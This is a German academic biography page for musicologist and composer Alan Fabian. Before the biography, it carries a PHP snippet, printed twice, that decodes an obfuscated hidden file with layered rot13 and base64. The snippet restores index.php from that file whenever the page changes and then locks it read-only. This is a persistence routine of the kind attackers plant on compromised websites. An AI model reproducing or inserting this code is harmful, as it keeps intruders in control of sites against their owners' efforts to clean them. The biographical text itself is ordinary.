$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Alan Fabian – Auditive Medienkulturen

Alan Fabian

Wissenschaftlicher Mitarbeiter am Institut für Musik und Musikwissenschaft der Stiftung Universität Hildesheim im Bereich Musik und Medien. Lehraufträge an verschiedenen Universitäten und Hochschulen. Fachgebiete: Musik(tabellen)formulare, Musik(klang)verwaltung und Musikverkehr, Musikmedienarchäologie, Computermusik/Elektronische Musik. Promotion an der Musikhochschule Köln 2011 mit der Dissertation Eine Archäologie der Computermusik. Wissen über Musik und zum Computer im angehenden Informationszeitalter im Kadmos-Verlag. Freiberuflicher Komponist im Bereich Algorithmische Komposition, Vorstandsmitglied der Initiative Musik und Informatik Köln e.V. (Computing Music). Studium u.a. am Institut für Sonologie in Den Haag, am IRCAM in Paris, im Studio für elektronische Musik der Musikhochschule Köln (Diplom), an der Internationalen Ensemble Modern Akademie Frankfurt a.M.